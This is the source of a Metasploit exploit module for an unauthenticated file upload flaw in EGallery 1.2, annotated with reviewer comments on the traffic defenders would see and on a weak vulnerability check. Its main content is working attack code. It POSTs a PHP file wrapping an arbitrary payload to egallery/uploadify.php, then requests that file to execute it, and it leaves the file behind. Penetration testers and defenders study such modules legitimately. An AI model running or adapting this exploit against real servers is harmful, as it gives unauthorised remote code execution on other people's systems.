Path: blob/master/modules/exploits/unix/webapp/egallery_upload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the EGallery 1.2 unauthenticated file upload
# (egallery/uploadify.php). It uploads a PHP file via a multipart POST and
# then requests that file over HTTP to trigger the payload.
#
# From a defender's point of view the observable sequence is: a multipart
# POST to <TARGETURI>/egallery/uploadify.php carrying a randomly named
# "*.php" file, followed by a GET for that same file name under TARGETURI.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata (name, references, payload constraints, target)
  # and the single option TARGETURI (base path of the EGallery install).
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info={})
    super(update_info(info,
      'Name'           => "EGallery PHP File Upload Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in EGallery 1.2 By abusing the
        uploadify.php file, a malicious user can upload a file to the egallery/ directory
        without any authentication, which results in arbitrary code execution. The module
        has been tested successfully on Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sammy FORGIT', # Discovery, PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '83891'],
          ['BID', '54464'],
          ['URL', 'http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
        ],
      'Payload'        =>
        {
          # The payload is embedded in a PHP source file, so a NUL byte would
          # truncate it.
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['EGallery 1.2', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-07-08',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])
      ])
  end

  # Vulnerability check: issues a GET for <TARGETURI>/egallery/uploadify.php.
  #
  # The only signal used is "HTTP 200 with an empty body", which is a weak
  # heuristic: it does not confirm the handler accepts uploads, and an
  # unrelated script that answers 200 with no content would also be reported.
  # NOTE(review): treat Appears as low confidence; a version string or a
  # non-destructive probe of the upload handler is not attempted here.
  #
  # @return [Exploit::CheckCode] Appears or Safe
  def check
    uri = target_uri.path

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, "egallery", "uploadify.php")
    })

    if res and res.code == 200 and res.body.empty?
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Builds a multipart/form-data body with three fields (Filename, folder,
  # Filedata), POSTs it to egallery/uploadify.php, and on apparent success
  # GETs the uploaded file from the base path to run the payload.
  #
  # Note that the "folder" field is set to the TARGETURI base path and the
  # follow-up GET fetches "<TARGETURI>/<payload_name>", i.e. the file is
  # expected under the base path rather than under egallery/ as the module
  # description says — presumably the server writes into whatever folder
  # value is supplied; confirm against uploadify.php before relying on this.
  def exploit
    uri = normalize_uri(target_uri.path)
    # Ensure a trailing slash so the string concatenations below form valid paths.
    uri << '/' if uri[-1,1] != '/'

    # NOTE(review): `peer` is assigned but never read in this method.
    peer = "#{rhost}:#{rport}"
    # Random 5..14 character alphabetic name, so each run leaves a different file.
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
    boundary = Rex::Text.rand_text_hex(7)

    post_data = "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    post_data << "#{payload_name}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"folder\"\r\n\r\n"
    post_data << "#{uri}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
    post_data << "<?php "
    post_data << payload.encoded
    post_data << " ?>\r\n"
    post_data << "--#{boundary}--\r\n"

    print_status("Sending PHP payload (#{payload_name})")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri("#{uri}egallery/uploadify.php"),
      'ctype' => "multipart/form-data; boundary=#{boundary}",
      'data' => post_data
    })

    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    # (payload_name is interpolated into the regex unescaped; with an
    # alphabetic name plus ".php" the only metacharacter is the dot, so the
    # match is slightly looser than a literal comparison but not wrong).
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      print_error("File wasn't uploaded, aborting!")
      return
    end

    print_status("Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri("#{uri}#{payload_name}")
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either. Print the status code for debugging purposes.
    # The uploaded file is not removed by this module, so a successful run
    # leaves "<payload_name>.php" on the server.
    if res and res.code != 200
      print_status("Server returned #{res.code.to_s}")
    end
  end
end